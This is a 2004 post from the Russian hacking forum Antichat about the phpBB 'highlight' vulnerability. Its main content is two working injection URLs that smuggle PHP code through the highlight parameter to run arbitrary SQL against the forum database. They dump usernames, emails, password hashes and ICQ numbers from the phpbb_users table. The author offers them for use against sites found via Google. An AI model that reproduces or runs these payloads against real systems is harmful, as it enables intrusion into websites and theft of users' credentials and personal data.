HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Исследование уязвимости в phpBB (highlight) в Гугле =)
  #1  
Старый 27.12.2004, 06:15
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
С нами: 11322986

Репутация: 62
По умолчанию Исследование уязвимости в phpBB (highlight) в Гугле =)

Вот полазил по гуглу - баг php ещё рулит, тока вот далеко не на всех сервах можно выполнить команду system(), а мне хотелось получить не которые данные из базы. ВОт что получилось в результате:

viewtopic.php?t=[topic]&highlight=%2527.mysql_connect($dbhost,$dbuser,$db passwd).($mvar=mysql_db_query($dbname,$_GET[sqlq])).print(mysql_num_rows($mvar)).mysql_close().%252 7&sqlq=SELECT+username,user_email,user_password,us er_icq+FROM+phpbb_users+WHERE+LENGTH(user_icq)%3E5 +AND+LENGTH(user_icq)%3C9;
этим получаем количество записей соответствующих запросу

viewtopic.php?t=[topic]&highlight=%2527.mysql_connect($dbhost,$dbuser,$db passwd).($mvar=mysql_db_query($dbname,$_GET[sqlq])).(($llrow=mysql_fetch_array($mvar))?0:1).print(s erialize($llrow).(($llrow=mysql_fetch_array($mvar) )?0:1).print(serialize($llrow). {...} .$_GET[br]).mysql_close().%2527&sqlq=SELECT+username,user_em ail,user_password,user_icq+FROM+phpbb_users+WHERE+ LENGTH(user_icq)%3E5+AND+LENGTH(user_icq)%3C9;&br= <br>
это получаем данные. {...} - здесь N-ое количество
(($llrow=mysql_fetch_array($mvar))?0:1).print(seri alize($llrow).
P.S.: в обоих запросах считается, что префих тавлиц phpbb_, если он другой, нужно его заменить.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие есть уязвимости в Powered by phpBB: 2.0.0 © 2001 phpBB Group? forever777 Уязвимости CMS / форумов 4 14.12.2005 13:19
Уязвимости в форумах phpbb до версии 2.0.13 *Van* Уязвимости CMS / форумов 3 27.11.2005 00:43
Вопрос про уязвимости в phpbb <=2.0.11 Evgeny Уязвимости CMS / форумов 2 27.12.2004 13:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.